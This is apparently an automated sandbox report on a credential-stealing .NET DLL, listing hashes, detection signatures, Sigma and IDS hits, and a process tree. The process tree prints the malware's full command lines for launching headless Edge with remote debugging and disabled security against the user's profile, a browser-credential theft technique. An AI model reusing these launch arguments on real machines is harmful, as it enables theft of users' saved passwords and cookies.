Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mP8rzGD7fG.dll

Overview

General Information

Sample name:mP8rzGD7fG.dll
renamed because original name is a hash value
Original sample name:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324.exe
Analysis ID:1590663
MD5:32893397afbb3b64a7ad72505d57b2a2
SHA1:8d901669e2e7ed707de6f6b78783bdef94ca347e
SHA256:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324
Tags:bot7711615259exeuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Telegram Recon
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7500 cmdline: loaddll64.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7552 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7576 cmdline: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • msedge.exe (PID: 7632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7980 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1480 --field-trial-handle=1524,i,7590272609190287249,10177671036043717879,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 6644 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9909 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rundll32.exe (PID: 7560 cmdline: rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers MD5: EF3179D498793BF4234F708D3BE28633)
      • msedge.exe (PID: 7640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9928 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7972 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1616 --field-trial-handle=1468,i,6882349471306671242,18432269874765290371,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7872 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9470 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1608 --field-trial-handle=1484,i,2587286534842799086,6337891116832541392,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 3176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9459 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 5012 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1624 --field-trial-handle=1556,i,748892074680113926,7417843126809738630,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rundll32.exe (PID: 5408 cmdline: rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeader MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 3004 cmdline: C:\Windows\system32\WerFault.exe -u -p 5408 -s 412 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 4564 cmdline: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbers MD5: EF3179D498793BF4234F708D3BE28633)
      • msedge.exe (PID: 7308 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9834 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1468,i,9150515577941078100,10285627021896123688,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8156 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9526 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 5716 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1596 --field-trial-handle=1468,i,8283710897970219115,15923041528330294747,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9949 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 1460 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1532 --field-trial-handle=1520,i,669827839164534897,9964202643193972366,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rundll32.exe (PID: 5472 cmdline: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeader MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7512 cmdline: C:\Windows\system32\WerFault.exe -u -p 5472 -s 416 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
mP8rzGD7fG.dllJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: rundll32.exe PID: 7560JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7576, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-syn
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7576, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-syn
        Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7576, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-syn
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T13:25:37.658822+010028033053Unknown Traffic192.168.2.449933172.65.251.78443TCP
        2025-01-14T13:25:40.466284+010028033053Unknown Traffic192.168.2.449956104.26.13.205443TCP
        2025-01-14T13:25:41.113485+010028033053Unknown Traffic192.168.2.449962104.26.13.205443TCP
        2025-01-14T13:25:41.660911+010028033053Unknown Traffic192.168.2.449964208.95.112.180TCP
        2025-01-14T13:25:42.323249+010028033053Unknown Traffic192.168.2.449968104.26.13.205443TCP
        2025-01-14T13:25:42.924536+010028033053Unknown Traffic192.168.2.449972104.26.13.205443TCP
        2025-01-14T13:25:43.392876+010028033053Unknown Traffic192.168.2.449976208.95.112.180TCP
        2025-01-14T13:26:35.032818+010028033053Unknown Traffic192.168.2.450069104.26.12.205443TCP
        2025-01-14T13:26:35.646885+010028033053Unknown Traffic192.168.2.450070104.26.12.205443TCP
        2025-01-14T13:26:36.126253+010028033053Unknown Traffic192.168.2.450071208.95.112.180TCP
        2025-01-14T13:26:36.742639+010028033053Unknown Traffic192.168.2.450072104.26.12.205443TCP
        2025-01-14T13:26:37.382369+010028033053Unknown Traffic192.168.2.450073104.26.12.205443TCP
        2025-01-14T13:26:37.858211+010028033053Unknown Traffic192.168.2.450074208.95.112.180TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: mP8rzGD7fG.dllVirustotal: Detection: 33%Perma Link
        Source: mP8rzGD7fG.dllReversingLabs: Detection: 47%
        Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49933 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49956 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:50069 version: TLS 1.2
        Source: mP8rzGD7fG.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: System.Diagnostics.Process.ni.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
